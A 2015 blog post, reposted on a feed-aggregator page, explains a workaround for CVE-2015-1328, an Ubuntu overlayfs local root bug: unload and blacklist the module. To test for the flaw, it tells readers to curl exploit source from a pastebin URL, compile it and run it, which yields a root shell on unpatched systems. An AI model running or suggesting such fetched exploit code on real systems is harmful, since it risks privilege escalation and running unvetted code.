惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

Stack Overflow Blog
Stack Overflow Blog
PCI Perspectives
PCI Perspectives
freeCodeCamp Programming Tutorials: Python, JavaScript, Git & More
让小产品的独立变现更简单 - ezindie.com
让小产品的独立变现更简单 - ezindie.com
V2EX - 技术
V2EX - 技术
Google DeepMind News
Google DeepMind News
量子位
博客园_首页
S
SegmentFault 最新的问题
S
Secure Thoughts
F
Full Disclosure
H
Hacker News: Front Page
博客园 - 三生石上(FineUI控件)
U
Unit 42
H
Heimdal Security Blog
N
News and Events Feed by Topic
A
About on SuperTechFans
C
CERT Recently Published Vulnerability Notes
Cyberwarzone
Cyberwarzone
Help Net Security
Help Net Security
The Hacker News
The Hacker News
L
LINUX DO - 最新话题
Application and Cybersecurity Blog
Application and Cybersecurity Blog
罗磊的独立博客
N
News | PayPal Newsroom
Spread Privacy
Spread Privacy
C
Cisco Blogs
C
CXSECURITY Database RSS Feed - CXSecurity.com
云风的 BLOG
云风的 BLOG
A
Arctic Wolf
Threat Intelligence Blog | Flashpoint
Threat Intelligence Blog | Flashpoint
Simon Willison's Weblog
Simon Willison's Weblog
B
Blog
人人都是产品经理
人人都是产品经理
TaoSecurity Blog
TaoSecurity Blog
博客园 - 【当耐特】
C
Cyber Attacks, Cyber Crime and Cyber Security
P
Proofpoint News Feed
Hugging Face - Blog
Hugging Face - Blog
I
InfoQ
D
DataBreaches.Net
大猫的无限游戏
大猫的无限游戏
Apple Machine Learning Research
Apple Machine Learning Research
L
LINUX DO - 热门话题
Google Online Security Blog
Google Online Security Blog
V
Visual Studio Blog
V
Vulnerabilities – Threatpost
Know Your Adversary
Know Your Adversary
CTFtime.org: upcoming CTF events
CTFtime.org: upcoming CTF events
B
Blog RSS Feed

Emil Burzo

GPS spoofing teleported me to Peru, mid-flight Running Claude Code dangerously (safely) Reverse engineering the Nest home/away API Tracking down an old OkHttp regression What does StackOverflow's personalized prediction data think of you? Cum se plătesc impozitele PFA prin BT24 Work-around for when keyserver.ubuntu.com is down Creating a tailable cursor on MongoDB 3 with the Java driver API Analiza parcului auto din România Setting up gitolite on Ubuntu 12.04 LTS
Quick fix for CVE-2015-1328
2015-06-16 · via Emil Burzo

As you may have noticed, a rather serious Ubuntu privilege escalation exploit has been disclosed today:

CVE-2015-1328: incorrect permission checks in overlayfs, ubuntu local root

The overlayfs filesystem does not correctly check file permissions when creating new files in the upper filesystem directory. This can be exploited by an unprivileged process in kernels with CONFIG_USER_NS=y and where overlayfs has the FS_USERNS_MOUNT flag, which allows the mounting of overlayfs inside unprivileged mount namespaces. This is the default configuration of Ubuntu 12.04, 14.04, 14.10, and 15.04 [1].

At the time of writing, there is no patch available.

However, there is a quick work-around for the issue (run as root):

modprobe -r overlayfs  
echo "blacklist overlayfs" > /etc/modprobe.d/blacklist-overlayfs.conf

What the above does:

  • remove the overlayfs module from memory, if currently loaded
  • blacklist the overlayfs module from being loaded at boot

Possible GOTCHA: the overlayfs module can be called just overlay in previous versions of Ubuntu.

You can check what is the correct name with:

modinfo overlay  
modinfo overlayfs

One of these will show the module information, and one will say “module not found”.

To confirm that you are not affected, try the following (run as a normal user):

curl http://pastebin.com/raw.php?i=aQD0LC7w -o cve-2015-1238.c  
gcc cve-2015-1238.c -o cve-2015-1238  
./cve-2015-1238

And you should see the following output if you are safe

$ ./cve-2015-1238
spawning threads  
mount #1  
no FS_USERNS_MOUNT for overlayfs on this kernel  
child threads done  
exploit failed
$

If you are not safe, you will get a root shell (#)